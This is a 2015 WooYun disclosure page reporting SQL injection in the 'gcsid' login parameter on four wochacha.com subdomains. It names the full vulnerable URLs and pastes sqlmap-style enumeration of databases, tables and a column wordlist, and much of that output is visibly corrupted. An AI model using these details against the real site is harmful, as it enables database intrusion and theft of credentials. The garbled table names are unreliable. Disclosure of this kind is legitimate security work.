当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132374

漏洞标题:我查查某站多处SQL注入打包提交(涉及8库)

相关厂商:wochacha.com

漏洞作者: 路人甲

提交时间:2015-08-07 16:47

修复时间:2015-08-12 16:48

公开时间:2015-08-12 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://wap.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://wphone.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://symbian.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://android.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


不同站点,gcsid存在注入

available databases [8]:
[*] `\t`
[*] `\x02`
[*] `\x02A`
`*] `gcore
[*] gcoreinc
[*] information_schema
[*] mysql
[*] securi

漏洞证明:

Database: gcore
[3 tables]
+----------------------------------------+
| !                                      |
| )                                      |
| \x02                                   |
+----------------------------------------+
Database: gcoreinc
[1 table]
+----------------------------------------+
| aow_ad i:                              |
+----------------------------------------+
Database: information_schema
[28 tables]
+----------------------------------------+
| COLUMNS                                |
| COLUMN_PRIVILEGES                      |
| ENGINES                                |
| EVENTS                                 |
| FILES                                  |
| PLUGIMS                                |
| POUTINES                               |
| PROCESSLIST                            |
| SESSION_SYATUS                         |
| SESSION_VzRIABLES                      |
| STATISTICS                             |
| TABLE_CONSTRAINTS                      |
| TABLE_CRIVILEHES                       |
| TABLrSC                                |
| TRIGGERSA                              |
| VIEaS                                  |
| ?E&HCOLDJDVUSAGE                       |
| CFLLATIA
| CHAACTER?QAEJ                         |
| COLJAR=OJ_CARACTER_SET_ALML40AB=LITY  |
| GLBAANABDE>                       |
| GLOBALRQU                          |
| P>9SDIOLS                             |
| PROBHIA                              |
| RFEB ))                               |
| SCHEMA\x07\\?fd\\?ce\\?9a\\?ae\x08\x05 |
| SCHEMAuP\\?ff\x0cIVILEGES\x19          |
| qSER\x02\x18\x0ePRIVILEGES             |
+----------------------------------------+
Database: mysql
[23 tables]
+----------------------------------------+
| user                                   |
| columns_priv                           |
| db                                     |
| event                                  |
| func                                   |
| general_log                            |
| help_category                          |
| help_keyword                           |
| help_relation                          |
| help_topic                             |
| host                                   |
| ndb_binlog_index                       |
| plugin                                 |
| proc                                   |
| procs_priv                             |
| servers                                |
| slow_log                               |
| tables_priv                            |
| time_zone                              |
| time_zone_leap_second                  |
| time_zone_name                         |
| time_zone_transition                   |
| time_zone_transition_type              |
+----------------------------------------+


+--------------------------+
| e-mail                   |
| abfrsql                  |
| account                  |
| address_book_id          |
| admin_psw                |
| administrateur           |
| adminname                |
| adress                   |
| after                    |
| aide                     |
| akses                    |
| allno                    |
| allow                    |
| allowmodpost             |
| answer_id                |
| articleid                |
| assigned_to              |
| attachment               |
| avatar                   |
| backlink                 |
| ban_id                   |
| basename                 |
| benutzer                 |
| blog_id                  |
| blogid                   |
| bp_id                    |
| bs_bid                   |
| bsm_id                   |
| c_commu_topic_id         |
| cache_id                 |
| callstart                |
| can_codice               |
| candidato                |
| cel                      |
| city                     |
| classid                  |
| clave                    |
| clients                  |
| cmtid                    |
| cod                      |
| cod_utente_mod           |
| cognome                  |
| com                      |
| complet                  |
| confirm_id               |
| consumidor               |
| content                  |
| coupon                   |
| creditcard               |
| cronid                   |
| cvvc                     |
| data_out                 |
| desd_xdecisao            |
| dis_codigo               |
| documento_id             |
| eid                      |
| en                       |
| enugene                  |
| event_id                 |
| export_id                |
| family                   |
| feed                     |
| feedid                   |
| file_id                  |
| fkidanagrafica           |
| forumid                  |
| gap_codigo               |
| gifi_accno               |
| glmm                     |
| groupe                   |
| guy                      |
| header                   |
| hid                      |
| hidden_url               |
| how                      |
| id_poll                  |
| id_product               |
| id_tra                   |
| idapparlocom             |
| idcapo                   |
| idcategoria              |
| idcuore                  |
| idesameobiettivo         |
| idevent                  |
| idgrouppermission        |
| idkontakt                |
| idreparto                |
| idsmaglog                |
| idstatocivile            |
| idstelle                 |
| idsubscriptiontickets    |
| idtipologiaricovero      |
| imenu                    |
| include_date             |
| institute_id             |
| invisible                |
| it_id                    |
| kat_id                   |
| key_id                   |
| kod                      |
| kode                     |
| kontakt                  |
| konto                    |
| kontr620                 |
| kre1                     |
| kunci                    |
| lahir                    |
| langid                   |
| loadmodule               |
| location_id              |
| login                    |
| login_admin              |
| login_user               |
| loginpas                 |
| loginpasswd              |
| logins                   |
| mailid                   |
| manufacturer             |
| matcode                  |
| mima                     |
| mod_custom               |
| mod_mainmenu             |
| mod_vm_cat_menu_specific |
| mopc                     |
| mossef                   |
| mosvote                  |
| mot_de_passe_bdd         |
| n_dept                   |
| n_id                     |
| nama                     |
| namaakun                 |
| nazwisko                 |
| newsfeeds                |
| nickname                 |
| nonnavigable             |
| nowy                     |
| ns                       |
| object_link_a_id         |
| ord_id                   |
| orderid                  |
| parole                   |
| part                     |
| paswd                    |
| pasword                  |
| platformid               |
| pmid                     |
| po_id                    |
| polloptionid             |
| pomoc                    |
| portachiavin             |
| post_id                  |
| postdatetime             |
| poster                   |
| prazo_xevento            |
| prc_sconto1              |
| privmsgs_id              |
| problem_code             |
| prodid                   |
| product_list             |
| productid                |
| q_trid                   |
| readperm                 |
| reason                   |
| recommend_product_id     |
| relid                    |
| sb_admin_name            |
| schedaid                 |
| schet                    |
| schl                     |
| searchbot                |
| searchstring             |
| sessionid                |
| skype                    |
| sql_text                 |
| standard                 |
| startnummer              |
| state_id                 |
| struct_id                |
| sub_comment4             |
| sub_image3               |
| sub_title4               |
| summaprihod              |
| summary_id               |
| sysuser                  |
| tags                     |
| taskid                   |
| templateid               |
| texte                    |
| threadorder              |
| timeid                   |
| title_id                 |
| tmp_lahir                |
| user_group               |
| user_login               |
| user_username            |
| users                    |
| uwierzytelnienia         |
| vinod                    |
| vm_manufacturer          |
| vorlnr                   |
| website                  |
| whabfragen               |
| who                      |
| word_id                  |
| wuser                    |
| xgrupo                   |
| xprognostico             |
| xrelatorio               |
+--------------------------+


wooyun.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-12 16:48

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无